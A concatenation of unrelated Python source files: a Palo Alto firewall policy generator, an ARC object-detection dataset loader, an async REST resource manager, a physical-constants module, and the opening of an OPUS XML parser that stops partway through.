"source_address",
"source_address_exclude",
"source_port",
"stateless_reply",
"timeout",
"pan_application",
"translated",
}
supported_sub_tokens.update({
"action": {"accept", "deny", "reject", "reject-with-tcp-rst"},
"option": {"established", "tcp-established"},
})
return supported_tokens, supported_sub_tokens
def _TranslatePolicy(self, pol, exp_info):
"""Transform a policy object into a PaloAltoFW object.
Args:
pol: policy.Policy object
exp_info: print a info message when a term is set to expire in that many
weeks
Raises:
UnsupportedFilterError: An unsupported filter was specified
UnsupportedHeaderError: A header option exists that is not
understood/usable
PaloAltoFWDuplicateTermError: Two terms were found with same name in
same filter
PaloAltoFWBadIcmpTypeError: The referenced ICMP type is not supported
by the policy term.
PaloAltoFWUnsupportedProtocolError: The term contains unsupporter protocol
name.
"""
current_date = datetime.date.today()
exp_info_date = current_date + datetime.timedelta(weeks=exp_info)
for header, terms in pol.filters:
if self._PLATFORM not in header.platforms:
continue
# The filter_options is a list of options from header, e.g.
# ['from-zone', 'internal', 'to-zone', 'external']
filter_options = header.FilterOptions(self._PLATFORM)
if (len(filter_options) < 4 or filter_options[0] != "from-zone" or
filter_options[2] != "to-zone"):
raise UnsupportedFilterError(
"Palo Alto Firewall filter arguments must specify from-zone and "
"to-zone.")
self.from_zone = filter_options[1]
self.to_zone = filter_options[3]
# The filter_type values are either inet, inet6, or mixed. Later, the
# code analyzes source and destination IP addresses and determines whether
# it is an appropriate type for the filter_type value.
if len(filter_options) > 4:
filter_type = filter_options[4]
else:
filter_type = "inet"
if filter_type not in self._SUPPORTED_AF:
raise UnsupportedHeaderError(
"Palo Alto Firewall Generator currently does not support"
" %s as a header option" % (filter_type))
term_dup_check = set()
new_terms = []
for term in terms:
if term.stateless_reply:
logging.warning(
"WARNING: Term %s in policy %s>%s is a stateless reply "
"term and will not be rendered.", term.name, self.from_zone,
self.to_zone)
continue
if "established" in term.option:
logging.warning(
"WARNING: Term %s in policy %s>%s is a established "
"term and will not be rendered.", term.name, self.from_zone,
self.to_zone)
continue
if "tcp-established" in term.option:
logging.warning(
"WARNING: Term %s in policy %s>%s is a tcp-established "
"term and will not be rendered.", term.name, self.from_zone,
self.to_zone)
continue
term.name = self.FixTermLength(term.name)
if term.name in term_dup_check:
raise PaloAltoFWDuplicateTermError("You have a duplicate term: %s" %
term.name)
term_dup_check.add(term.name)
if term.expiration:
if term.expiration <= exp_info_date:
logging.info(
"INFO: Term %s in policy %s>%s expires "
"in less than two weeks.", term.name, self.from_zone,
self.to_zone)
if term.expiration <= current_date:
logging.warning(
"WARNING: Term %s in policy %s>%s is expired and "
"will not be rendered.", term.name, self.from_zone,
self.to_zone)
continue
for i in term.source_address_exclude:
term.source_address = nacaddr.RemoveAddressFromList(
term.source_address, i)
for i in term.destination_address_exclude:
term.destination_address = nacaddr.RemoveAddressFromList(
term.destination_address, i)
# Count the number of occurencies of a particular version of the
# address family, i.e. v4/v6 in source and destination IP addresses.
afc = {
4: {
"src": 0,
"dst": 0
},
6: {
"src": 0,
"dst": 0
},
}
# Determine the address families in the source and destination
# addresses references in the term. Next, determine IPv4 and IPv6
# traffic flow patterns.
exclude_address_family = []
flows = []
src_any = False
dst_any = False
if not term.source_address:
src_any = True
if not term.destination_address:
dst_any = True
for addr in term.source_address:
afc[addr.version]["src"] += 1
for addr in term.destination_address:
afc[addr.version]["dst"] += 1
for v in [4, 6]:
if src_any and dst_any:
flows.append("ip%d-ip%d" % (v, v))
continue
if (afc[v]["src"] == 0 and not src_any) and (afc[v]["dst"] == 0 and
not dst_any):
continue
if (afc[v]["src"] > 0 or src_any) and (afc[v]["dst"] > 0 or dst_any):
flows.append("ip%d-ip%d" % (v, v))
continue
if (afc[v]["src"] > 0 or src_any) and afc[v]["dst"] == 0:
flows.append("ip%d-src-only" % v)
flows.append("ip%d-only" % v)
continue
if afc[v]["src"] == 0 and (afc[v]["dst"] > 0 or dst_any):
flows.append("ip%d-dst-only" % v)
flows.append("ip%d-only" % v)
if filter_type == "inet":
if "icmpv6" in term.protocol:
logging.warning(
"WARNING: Term %s in policy %s>%s references ICMPv6 protocol, "
"term will not be rendered.", term.name, self.from_zone,
self.to_zone)
continue
if "ip4-ip4" not in flows:
logging.warning(
"WARNING: Term %s in policy %s>%s has one or more invalid "
"src-dest combinations %s, term will not be rendered.",
term.name, self.from_zone, self.to_zone, flows)
continue
# exclude IPv6 addresses
exclude_address_family.append(6)
elif filter_type == "inet6":
if "icmp" in term.protocol:
logging.warning(
"WARNING: Term %s in policy %s>%s references ICMP protocol, "
"term and will not be rendered.", term.name, self.from_zone,
self.to_zone)
continue
if "ip6-ip6" not in flows:
logging.warning(
"WARNING: Term %s in policy %s>%s has one or more invalid "
"src-dest combinations %s, term will not be rendered.",
term.name, self.from_zone, self.to_zone, flows)
continue
exclude_address_family.append(4)
elif filter_type == "mixed":
if "ip4-ip4" in flows and "ip6-ip6" not in flows:
exclude_address_family.append(6)
pass
elif "ip6-ip6" in flows and "ip4-ip4" not in flows:
exclude_address_family.append(4)
pass
elif "ip4-ip4" in flows and "ip6-ip6" in flows:
pass
elif "ip4-only" in flows and "ip6-only" in flows:
logging.warning(
"WARNING: Term %s in policy %s>%s has source and destinations "
"of different address families %s, term will not be "
"rendered.", term.name, self.from_zone, self.to_zone,
filter(lambda p: re.search(p, "(src|dst)-only"), flows))
continue
else:
logging.warning(
"WARNING: Term %s in policy %s>%s has invalid src-dest "
"combinations %s, the term will be rendered without them.",
term.name, self.from_zone, self.to_zone,
filter(lambda p: re.search(p, "(src|dst)-only"), flows))
if "ip4-ip4" in flows:
exclude_address_family.append(6)
else:
exclude_address_family.append(4)
# Build address book for the addresses referenced in the term.
for addr in term.source_address:
if addr.version in exclude_address_family:
continue
self._BuildAddressBook(self.from_zone, addr)
for addr in term.destination_address:
if addr.version in exclude_address_family:
continue
self._BuildAddressBook(self.to_zone, addr)
# Handle ICMP/ICMPv6 terms.
if term.icmp_type and ("icmp" not in term.protocol and
"icmpv6" not in term.protocol):
raise UnsupportedFilterError(
"Palo Alto Firewall filter must have ICMP or ICMPv6 protocol " +
"specified when using icmp_type keyword")
for icmp_version in ["icmp", "icmpv6"]:
if ("icmp" not in term.protocol and "icmpv6" not in term.protocol):
# the protocol is not ICMP or ICMPv6
break
if icmp_version == "icmp" and "ip4-ip4" not in flows:
# skip if there is no ip4 to ipv4 communication
continue
if icmp_version == "icmpv6" and "ip6-ip6" not in flows:
# skip if there is no ip4 to ipv4 communication
continue
if icmp_version == "icmp":
if filter_type == "inet6":
continue
if not term.icmp_type:
term.pan_application.append("icmp")
continue
icmp_type_keyword = "ident-by-icmp-type"
# The risk level 4 is the default PANOS' risk level for ICMP.
risk_level = 4
else:
if filter_type == "inet":
continue
if not term.icmp_type:
term.pan_application.append("ipv6-icmp")
continue
icmp_type_keyword = "ident-by-icmp6-type"
# The risk level 2 is the default PANOS' risk level for ICMPv6.
risk_level = 2
# The term contains ICMP types
for term_icmp_type_name in term.icmp_type:
if icmp_version == "icmp":
icmp_app_name = "icmp-%s" % term_icmp_type_name
if term_icmp_type_name not in policy.Term.ICMP_TYPE[4]:
raise PaloAltoFWBadIcmpTypeError(
"term with bad icmp type: %s, icmp_type: %s" %
(term.name, term_icmp_type_name))
term_icmp_type = policy.Term.ICMP_TYPE[4][term_icmp_type_name]
else:
icmp_app_name = "icmp6-%s" % term_icmp_type_name
if term_icmp_type_name not in policy.Term.ICMP_TYPE[6]:
raise PaloAltoFWBadIcmpTypeError(
"term with bad icmp type: %s, icmp_type: %s" %
(term.name, term_icmp_type_name))
term_icmp_type = policy.Term.ICMP_TYPE[6][term_icmp_type_name]
if icmp_app_name in self.application_refs:
# the custom icmp application already exists
continue
app_entry = {
"category": "networking",
"subcategory": "ip-protocol",
"technology": "network-protocol",
"description": icmp_app_name,
"default": {
icmp_type_keyword: "%d" % term_icmp_type,
},
"risk": "%d" % risk_level,
}
self.application_refs[icmp_app_name] = app_entry
self.applications.append(icmp_app_name)
if icmp_app_name not in term.pan_application:
term.pan_application.append(icmp_app_name)
# Filter out unsupported protocols
for proto_name in term.protocol:
if proto_name in self._SUPPORTED_PROTO_NAMES:
continue
raise PaloAltoFWUnsupportedProtocolError(
"protocol %s is not supported" % proto_name)
# Create Term object with the term, address family, and header
# parameters, e.g. to/from zone, and add it to a list of
# terms that would form a rule.
new_term = Term(term, filter_type, filter_options)
new_terms.append(new_term)
# Create a ruleset. It contains the rules for the terms defined under
# a single header on a particular platform.
ruleset = {}
for term in new_terms:
current_rule = Rule(self.from_zone, self.to_zone, term)
ruleset[term.term.name] = current_rule.options
self.pafw_policies.append((header, ruleset, filter_options))
def _BuildAddressBook(self, zone, address):
"""Create the address book configuration entries.
Args:
zone: the zone these objects will reside in
address: a naming library address object
"""
if zone not in self.addressbook:
self.addressbook[zone] = collections.OrderedDict()
if address.parent_token not in self.addressbook[zone]:
self.addressbook[zone][address.parent_token] = []
name = address.parent_token
for ip in self.addressbook[zone][name]:
if str(address) == str(ip[0]):
return
counter = len(self.addressbook[zone][address.parent_token])
name = "%s_%s" % (name, str(counter))
self.addressbook[zone][address.parent_token].append((address, name))
def _SortAddressBookNumCheck(self, item):
"""Used to give a natural order to the list of acl entries.
Args:
item: string of the address book entry name
Returns:
returns the characters and number
"""
item_list = item.split("_")
num = item_list.pop(-1)
if isinstance(item_list[-1], int):
set_number = item_list.pop(-1)
num = int(set_number) * 1000 + int(num)
alpha = "_".join(item_list)
if num:
return (alpha, int(num))
return (alpha, 0)
def _BuildPort(self, ports):
"""Transform specified ports into list and ranges.
Args:
ports: a policy terms list of ports
Returns:
port_list: list of ports and port ranges
"""
port_list = []
for i in ports:
if i[0] == i[1]:
port_list.append(str(i[0]))
else:
port_list.append("%s-%s" % (str(i[0]), str(i[1])))
return port_list
def __str__(self):
"""Render the output of the PaloAltoFirewall policy into config."""
# INITAL CONFIG
config = etree.Element("config", {"version": "8.1.0",
"urldb": "paloaltonetworks"})
devices = etree.SubElement(config, "devices")
device_entry = etree.SubElement(devices, "entry",
{"name": "localhost.localdomain"})
vsys = etree.SubElement(device_entry, "vsys")
vsys_entry = etree.SubElement(vsys, "entry", {"name": "vsys1"})
# APPLICATION
app_entries = etree.Element("application")
for app_name in self.applications:
if app_name not in self.application_refs:
# this is not a custom application.
continue
app = self.application_refs[app_name]
app_entry = etree.SubElement(app_entries, "entry", {"name": app_name})
for k in self.application_refs[app_name]:
if isinstance(app[k], (str)):
etree.SubElement(app_entry, k).text = app[k]
elif isinstance(app[k], (dict)):
if k == "default":
default_props = etree.SubElement(app_entry, "default")
else:
continue
for prop in app[k]:
if k == "default" and prop in [
"ident-by-icmp-type", "ident-by-icmp6-type"
]:
icmp_type_props = etree.SubElement(default_props, prop)
etree.SubElement(icmp_type_props, "type").text = app[k][prop]
else:
pass
vsys_entry.append(app_entries)
# APPLICATION GROUPS
etree.SubElement(vsys_entry, "application-group")
# SERVICES
vsys_entry.append(etree.Comment(" Services "))
service = etree.SubElement(vsys_entry, "service")
for k, v in Service.service_map.items():
entry = etree.SubElement(service, "entry", {"name": v["name"]})
proto0 = etree.SubElement(entry, "protocol")
proto = etree.SubElement(proto0, k[1])
port = etree.SubElement(proto, "port")
tup = str(k[0])[1:-1]
if tup[-1] == ",":
tup = tup[:-1]
port.text = tup.replace("'", "").replace(", ", ",")
# RULES
vsys_entry.append(etree.Comment(" Rules "))
rulebase = etree.SubElement(vsys_entry, "rulebase")
security = etree.SubElement(rulebase, "security")
rules = etree.SubElement(security, "rules")
tag = etree.Element("tag")
tag_num = 0
# pytype: disable=key-error
# pylint: disable=unused-variable
for (header, pa_rules, filter_options) in self.pafw_policies:
tag_name = None
if header.comment:
comment = " ".join(header.comment).strip()
if comment:
tag_num += 1
# max tag len 127, max zone len 31
tag_name = self._TAG_NAME_FORMAT.format(
from_zone=filter_options[1], to_zone=filter_options[3],
num=tag_num)
tag_entry = etree.SubElement(tag, "entry",
{"name": tag_name})
comments = etree.SubElement(tag_entry, "comments")
comments.text = comment[:self._MAX_TAG_COMMENTS_LENGTH]
for name, options in pa_rules.items():
entry = etree.SubElement(rules, "entry", {"name": name})
if options["description"]:
descr = etree.SubElement(entry, "description")
x = " ".join(options["description"])
descr.text = x[:self._MAX_RULE_DESCRIPTION_LENGTH]
to = etree.SubElement(entry, "to")
for x in options["to_zone"]:
member = etree.SubElement(to, "member")
member.text = x
from_ = etree.SubElement(entry, "from")
for x in options["from_zone"]:
member = etree.SubElement(from_, "member")
member.text = x
source = etree.SubElement(entry, "source")
if not options["source"]:
member = etree.SubElement(source, "member")
member.text = "any"
else:
for x in options["source"]:
member = etree.SubElement(source, "member")
member.text = x
dest = etree.SubElement(entry, "destination")
if not options["destination"]:
member = etree.SubElement(dest, "member")
member.text = "any"
else:
for x in options["destination"]:
member = etree.SubElement(dest, "member")
member.text = x
# service section of a policy rule.
service = etree.SubElement(entry, "service")
if not options["service"] and not options["application"]:
member = etree.SubElement(service, "member")
member.text = "any"
elif not options["service"] and options["application"]:
# Adds custom applications.
member = etree.SubElement(service, "member")
member.text = "application-default"
else:
# Adds services.
for x in options["service"]:
member = etree.SubElement(service, "member")
member.text = x
# ACTION
action = etree.SubElement(entry, "action")
action.text = Term.ACTIONS.get(str(options["action"]))
# check whether the rule is interzone
if list(set(options["from_zone"]).difference(options["to_zone"])):
type_ = etree.SubElement(entry, "rule-type")
type_.text = "interzone"
elif not options["from_zone"] and not options["to_zone"]:
type_ = etree.SubElement(entry, "rule-type")
type_.text = "interzone"
# APPLICATION
app = etree.SubElement(entry, "application")
if not options["application"]:
member = etree.SubElement(app, "member")
member.text = "any"
else:
for x in options["application"]:
member = etree.SubElement(app, "member")
member.text = x
if tag_name is not None:
rules_tag = etree.SubElement(entry, "tag")
member = etree.SubElement(rules_tag, "member")
member.text = tag_name
# LOGGING
if options["logging"]:
if "disable" in options["logging"]:
log = etree.SubElement(entry, "log-start")
log.text = "no"
log = etree.SubElement(entry, "log-end")
log.text = "no"
if "log-start" in options["logging"]:
log = etree.SubElement(entry, "log-start")
log.text = "yes"
if "log-end" in options["logging"]:
log = etree.SubElement(entry, "log-end")
log.text = "yes"
# pytype: enable=key-error
# ADDRESS
address_book_names_dict = {}
address_book_groups_dict = {}
for zone in self.addressbook:
# building individual addresses dictionary
groups = sorted(self.addressbook[zone])
for group in groups:
for address, name in self.addressbook[zone][group]:
if name in address_book_names_dict:
if address_book_names_dict[name].supernet_of(address):
continue
address_book_names_dict[name] = address
# building individual address-group dictionary
for nested_group in groups:
group_names = []
for address, name in self.addressbook[zone][nested_group]:
group_names.append(name)
address_book_groups_dict[nested_group] = group_names
# sort address books and address sets
address_book_groups_dict = collections.OrderedDict(
sorted(address_book_groups_dict.items()))
address_book_keys = sorted(
list(address_book_names_dict.keys()), key=self._SortAddressBookNumCheck)
vsys_entry.append(etree.Comment(" Address Groups "))
addr_group = etree.SubElement(vsys_entry, "address-group")
for group, address_list in address_book_groups_dict.items():
entry = etree.SubElement(addr_group, "entry", {"name": group})
static = etree.SubElement(entry, "static")
for name in address_list:
member = etree.SubElement(static, "member")
member.text = name
vsys_entry.append(etree.Comment(" Addresses "))
addr = etree.SubElement(vsys_entry, "address")
for name in address_book_keys:
entry = etree.SubElement(addr, "entry", {"name": name})
desc = etree.SubElement(entry, "description")
desc.text = name
ip = etree.SubElement(entry, "ip-netmask")
ip.text = str(address_book_names_dict[name])
vsys_entry.append(tag)
self.config = config
document = etree.tostring(config, encoding="UTF-8")
dom = minidom.parseString(document.decode("UTF-8"))
return dom.toprettyxml(indent=self.INDENT)
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import pycocotools.coco as coco
from pycocotools.cocoeval import COCOeval
import numpy as np
import json
import os
import torch.utils.data as data
class ARC(data.Dataset):
num_classes = 40
default_resolution = [512, 512]
mean = np.array([0.36490161, 0.38790256, 0.42305998],
dtype=np.float32).reshape(1, 1, 3)
std = np.array([0.20007855, 0.28563227, 0.31387719],
dtype=np.float32).reshape(1, 1, 3)
def __init__(self, opt, split):
super(ARC, self).__init__()
self.data_dir = os.path.join(opt.data_dir, 'arc')
self.img_dir = os.path.join(self.data_dir, '{}'.format(split))
if split == 'test':
self.annot_path = os.path.join(
self.data_dir, 'annotations',
'val_arc.json').format(split)
else:
self.annot_path = os.path.join(
self.data_dir, 'annotations',
'{}_arc.json').format(split)
self.max_objs = 40
self.class_name = [
'__background__', 'Binder', 'Balloons', 'Baby_Wipes',
'Toilet_Brush', 'Toothbrushes', 'Crayons', 'Salts', 'DVD',
'Glue_Sticks', 'Eraser', 'Scissors', 'Green_Book', 'Socks',
'Irish_Spring', 'Paper_Tape', 'Touch_Tissues', 'Knit_Gloves',
'Laugh_Out_Loud_Jokes', 'Pencil_Cup', 'Mini_Marbles',
'Neoprene_Weight', 'Wine_Glasses', 'Water_Bottle', 'Reynolds_Pie',
'Reynolds_Wrap', 'Robots_Everywhere', 'Duct_Tape', 'Sponges',
'Speed_Stick', 'Index_Cards', 'Ice_Cube_Tray', 'Table_Cover',
'Measuring_Spoons', 'Bath_Sponge', 'Pencils', 'Mousetraps',
'Face_Cloth', 'Tennis_Balls', 'Spray_Bottle', 'Flashlights']
self._valid_ids = [
1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
21, 22, 23, 24, 25, 26, 27, 28, 29, 30,
31, 32, 33, 34, 35, 36, 37, 38, 39, 40]
self.cat_ids = {v: i for i, v in enumerate(self._valid_ids)}
self.voc_color = [(v // 32 * 64 + 64, (v // 8) % 4 * 64, v % 8 * 32) \
for v in range(1, self.num_classes + 1)]
self._data_rng = np.random.RandomState(123)
self._eig_val = np.array([0.2141788, 0.01817699, 0.00341571],
dtype=np.float32)
self._eig_vec = np.array([
[-0.58752847, -0.69563484, 0.41340352],
[-0.5832747, 0.00994535, -0.81221408],
[-0.56089297, 0.71832671, 0.41158938]
], dtype=np.float32)
self.split = split
self.opt = opt
print('==> initializing arc 2017 {} data.'.format(split))
self.coco = coco.COCO(self.annot_path)
self.images = self.coco.getImgIds()
self.num_samples = len(self.images)
print('Loaded {} {} samples'.format(split, self.num_samples))
def _to_float(self, x):
return float("{:.2f}".format(x))
def convert_eval_format(self, all_bboxes):
# import pdb; pdb.set_trace()
detections = []
for image_id in all_bboxes:
for cls_ind in all_bboxes[image_id]:
category_id = self._valid_ids[cls_ind - 1]
for bbox in all_bboxes[image_id][cls_ind]:
bbox[2] -= bbox[0]
bbox[3] -= bbox[1]
score = bbox[4]
bbox_out = list(map(self._to_float, bbox[0:4]))
detection = {
"image_id": int(image_id),
"category_id": int(category_id),
"bbox": bbox_out,
"score": float("{:.2f}".format(score))
}
if len(bbox) > 5:
extreme_points = list(map(self._to_float, bbox[5:13]))
detection["extreme_points"] = extreme_points
detections.append(detection)
return detections
def __len__(self):
return self.num_samples
def save_results(self, results, save_dir):
json.dump(self.convert_eval_format(results),
open('{}/results.json'.format(save_dir), 'w'))
def run_eval(self, results, save_dir):
# result_json = os.path.join(save_dir, "results.json")
# detections = self.convert_eval_format(results)
# json.dump(detections, open(result_json, "w"))
self.save_results(results, save_dir)
coco_dets = self.coco.loadRes('{}/results.json'.format(save_dir))
coco_eval = COCOeval(self.coco, coco_dets, "bbox")
coco_eval.evaluate()
coco_eval.accumulate()
coco_eval.summarize()
|
<filename>src/restclientaio/manager.py
from collections import defaultdict
from typing import Any, AsyncIterable, AsyncIterator, Dict, Sequence, Type, \
TypeVar, cast
from weakref import WeakValueDictionary
from aiostream import stream
from .hydrator import Hydrator
from .request import Requester
from .resource import Resource, ResourceError
__all__ = ('ResourceManager',)
R = TypeVar('R', bound=Resource)
class ResourceManager:
"""Manages retrieval and saving of resource objects.
Generally, this class should not be used directly -- use explicit
`.Repository` for the wanted resource type instead.
`ResourceManager` uses an identity map to avoid double-instantiating of
resources if they have an id field.
:param requester:
:param hydrator:
"""
def __init__(self, requester: Requester, hydrator: Hydrator) -> None:
self._requester = requester
self._hydrator = hydrator
self._identity_map = defaultdict(lambda: WeakValueDictionary()) \
# type: Dict[Type[Resource], WeakValueDictionary[Any, Resource]]
def _get_meta(
self,
cls: Type[R],
action: str,
overrides: Dict[str, Any] = {},
) -> Dict[str, Any]:
"""Get meta info for class and action, including overrides."""
meta: Dict[str, Any] = {}
if hasattr(cls, '_Meta'):
meta = getattr(cls._Meta, action, {})
meta.update(overrides)
return meta
def _get_id_attr(self, resource_class: Type[R]) -> str:
"""Get identifier attribute name, if any."""
return str(getattr(getattr(resource_class, '_Meta', None), 'id', 'id'))
def get_id(self, resource: R) -> Any:
"""Get identifier value, or `None`.
:param resource:
"""
idattr = self._get_id_attr(type(resource))
return getattr(resource, idattr, None)
def is_new(self, resource: R) -> Any:
"""Check if resource was created but not saved yet.
:param resource:
"""
return self.get_id(resource) is None
def _track(self, resource: R) -> None:
"""Add resource to the identity map."""
id = self.get_id(resource) # noqa: B001
if id is not None:
self._identity_map[type(resource)][id] = resource
def _get_or_instantiate(
self,
resource_class: Type[R],
data: Dict[str, Any],
) -> R:
"""Return an object hydrated with `data`.
If a matching object can be found in the identity map, use it,
otherwise instatiate a new one.
:param resource_class: Type of the resource.
:param data:
"""
if not isinstance(data, dict):
raise ResourceError(f'Expected a dict, got {type(data)!r}')
idattr = self._get_id_attr(resource_class)
id = data.get(idattr) # noqa: B001
resource = cast(R, self._identity_map[resource_class].get(id))
if resource is None:
resource = self.new(resource_class)
self._hydrator.hydrate(resource, data)
self._track(resource)
return resource
async def get(
self,
resource_class: Type[R],
id: Any,
meta: Dict[str, Any] = {},
) -> R:
"""Fetch a resource by id.
:param resource_class: Type of the resource.
:param id: Identifier value.
:param meta: Additional info to pass to the `.Requester`.
"""
idattr = self._get_id_attr(resource_class)
meta = self._get_meta(resource_class, 'get', meta)
meta[idattr] = id
meta['uri'] = meta['uri'].format(**{idattr: id or ''})
response = await self._requester.get(meta)
return self._get_or_instantiate(resource_class, response)
async def list(
self,
resource_class: Type[R],
meta: Dict[str, Any] = {},
) -> AsyncIterator[R]:
"""Fetch a list of resources.
:param resource_class: Type of the resource.
:param meta: Additional info to pass to the `.Requester` (like filters,
etc.).
"""
meta = self._get_meta(resource_class, 'list', meta)
response = await self._requester.list(meta)
if not isinstance(response, (Sequence, AsyncIterable)):
raise ResourceError(
f'Expected an iterable, got {type(response)!r}',
)
async with stream.iterate(response).stream() as s:
async for data in s:
yield self._get_or_instantiate(resource_class, data)
def new(
self,
resource_class: Type[R],
) -> R:
"""Create a new instance, but don't save it.
:param resource_class: Type of the resource.
"""
resource = resource_class()
self._hydrator.hydrate(resource, {}, force_clear=True)
return resource
async def save(self, resource: R, meta: Dict[str, Any] = {}) -> None:
"""Save resource.
:param resource: The resource to save.
:param meta: Additional info to pass to the `.Requester`.
"""
data = self._hydrator.dehydrate(resource)
if self.is_new(resource):
meta = self._get_meta(type(resource), 'create', meta)
data = await self._requester.create(meta, data)
else:
meta = self._get_meta(type(resource), 'update', meta)
data = await self._requester.update(meta, data)
if data and isinstance(data, dict):
self._hydrator.hydrate(resource, data)
self._track(resource)
|
<reponame>julemai/EEE-DA
#!/usr/bin/env python
from __future__ import print_function
import numpy as np
"""
Provides physical, mathematical, computational, and isotope constants.
Definition
----------
Pi = 3.141592653589793238462643383279502884197
...
Define the following constants:
Mathematical
Pi, Pi2, Pi3, TwoPi, Sqrt2
Physical
Gravity, T0, P0, T25, sigma, R, Na, REarth
Isotope
R13VPDB, R18VSMOW, R2VSMOW
Computational
tiny, huge, eps
Material
mmol_co2, mmol_h2o, mmol_air
density_quartz, cheat_quartz, cheat_water, cheat_air, latentheat_vaporization
Examples
--------
>>> from autostring import astr
>>> print(astr(Pi,3,pp=True))
3.142
>>> print(astr(Sqrt2,3,pp=True))
1.414
>>> print(astr(Gravity,3,pp=True))
9.810
>>> print(astr(T0,3,pp=True))
273.150
>>> print(astr(sigma,3,pp=True))
5.670e-08
>>> print(astr(R13VPDB,3,pp=True))
0.011
>>> print(astr(tiny,3,pp=True))
1.000e-06
>>> print(astr(REarth,3,pp=True))
6371000.000
>>> print(astr(mmol_h2o,3,pp=True))
18.015
>>> print(astr(mmol_air,3,pp=True))
28.964
>>> print(astr(density_quartz,3,pp=True))
2.650
>>> print(astr(cheat_quartz,3,pp=True))
800.000
>>> print(astr(cheat_water,3,pp=True))
4180.000
>>> print(astr(cheat_air,3,pp=True))
1010.000
>>> print(astr(latentheat_vaporization,3,pp=True))
2.450e+06
License
-------
This file is part of the JAMS Python package.
The JAMS Python package is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
The JAMS Python package is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with the JAMS Python package (cf. gpl.txt and lgpl.txt).
If not, see <http://www.gnu.org/licenses/>.
Copyright 2012-2014 <NAME>
History
-------
Written, MC, Jan 2012
Modified, MC, Feb 2013 - ported to Python 3
AP, Mar 2014 - dielectric constant H2O
AP, Sep 2014 - heat capacity of quartz, air and water, density of quartz
MC, Mar 2015 - Pi3=Pi/3
- rename heat capacities, molar masses, density of quartz
- moved dielH2O to own routine/file
- R13VPDB, R18VSMOW, R2VSMOW
MC, Nov 2016 - tiny->np.finfo(np.float).tiny, huge
"""
__all__ = ['Pi', 'Pi2', 'Pi3', 'TwoPi', 'Sqrt2',
'Gravity', 'T0', 'P0', 'T25', 'sigma', 'R', 'Na', 'REarth',
'mmol_co2', 'mmol_h2o', 'mmol_air',
'density_quartz', 'cheat_quartz', 'cheat_water', 'cheat_air', 'latentheat_vaporization',
'R13VPDB', 'R18VSMOW', 'R2VSMOW',
'tiny', 'huge', 'eps']
# Mathematical
Pi = 3.141592653589793238462643383279502884197 # Pi
Pi2 = 1.57079632679489661923132169163975144209858 # Pi/2
Pi3 = 1.0471975511965977461542144610931676280656 # Pi/3
TwoPi = 6.283185307179586476925286766559005768394 # 2*Pi
Sqrt2 = 1.41421356237309504880168872420969807856967 # Sqrt(2)
# Physical
Gravity = 9.81 # Standard average Earth's gravity [m^2 s^-1]
T0 = 273.15 # Celcius <-> Kelvin [K]
P0 = 101325. # Standard pressure [Pa]
T25 = 298.15 # Standard ambient temperature [K]
sigma = 5.67e-08 # Stefan-Boltzmann constant [W m^-2 K^-4]
R = 8.3144621 # Ideal gas constant [J K^-1 mol^-1]
Na = 6.02214129e23 # Avogrado number [mol^-1]
REarth = 6371009. # Radius of Earth [m]
# Material
mmol_co2 = 44.01 # Molar mass CO2 [g mol^-1]
mmol_h2o = 18.01528 # Molar mass water [g mol^-1]
mmol_air = 28.9644 # Molar mass of dry air [g mol^-1]
# from <NAME> (1985) Soil Physics with BASIC, Elsevier Science
density_quartz = 2.65 # density of quartz [g cm^-3]
cheat_quartz = 800. # heat capacity of quartz [J kg^-1 K^-1]
cheat_water = 4180. # heat capacity of water [J kg^-1 K^-1]
cheat_air = 1010. # heat capacity of air [J kg^-1 K^-1]
latentheat_vaporization = 2.45e6 # latent heat of vaporization of water [J kg^-1]
# Isotope
R13VPDB = 0.0112372 # 13C isotope ratio of VPDB
R18VSMOW = 2005.2e-6 # 18O isotope ratio of VSMOW
R2VSMOW = 155.76e-6 # 2H isotope ratio of VSMOW
# Computational
eps = np.finfo(np.float).eps
huge = np.finfo(np.float).max
tiny = np.finfo(np.float).tiny
if __name__ == '__main__':
import doctest
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
<filename>opusxml/core/opus.py
from __future__ import annotations
from collections import OrderedDict
import logging
from lxml import etree
import pint
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
class Solution:
def __init__(self, filename: str):
tree = etree.parse(filename)
self.root = tree.getroot()
def solution_info(self) -> OrderedDict:
"""
Return a dict containing information about the solution.
"""
ureg = pint.UnitRegistry()
info = OrderedDict([
('SID', self.root.get('SID')),
('SOLUTION_TIME', self.root.find('SOLUTION_TIME').text),
('OBSERVATION_TIME_START', self.root.find('OBSERVATION_TIME').get('START')),
('OBSERVATION_TIME_END', self.root.find('OBSERVATION_TIME').get('END')),
('CONTRIBUTOR_EMAIL', self.root.find('CONTRIBUTOR/EMAIL').text),
('RINEX_FILE', self.root.find('DATA_SOURCES/RINEX_FILE').text),
('EPHEMERIS_FILE_TYPE', self.root.find('DATA_SOURCES/EPHEMERIS_FILE').get('TYPE')),
('ANTENNA_NAME', self.root.find('DATA_SOURCES/ANTENNA/NAME').text),
('ANTENNA_ARP_HEIGHT', self.root.find('DATA_SOURCES/ANTENNA/ARP_HEIGHT').text),
# Using a Quanity object in pint will make fiona unhappy
#('ANTENNA_ARP_HEIGHT', self.root.find('DATA_SOURCES/ANTENNA/ARP_HEIGHT').text * ureg(self.root.find('DATA_SOURCES/ANTENNA/ARP_HEIGHT').get('UNIT'))),
])
return info
def mark_info(self) -> OrderedDict:
"""
Returns a dict containing information about the mark.
"""
info = OrderedDict()
elems = ['PID', 'DESIGNATION', 'STAMPING', 'MONUMENT_TYPE', 'MONUMENT_DESC', 'STABILITY', 'DESCRIPTION']
for e in elems:
try:
path = 'MARK_METADATA/' + e
info[e] = self.root.find('{}'.format(path)).text
except:
info[e] = 'None'
return info
def data_quality(
self,
unit: str = 'm'
) -> tuple[list[float], float, list[int], list[int]]:
"""
Extract the information from an OPUS XML file DATA_QUALITY element, and return it in the desired units.
Parameters
----------
unit (str) : distance units of the returned coordinate, valid values are 'm' or 'sft'.
Returns
-------
accuracy (float Quantity array) : array of Quanity contining x,y,z coordinate accuracies.
rms (float Quantity) : the RMS value
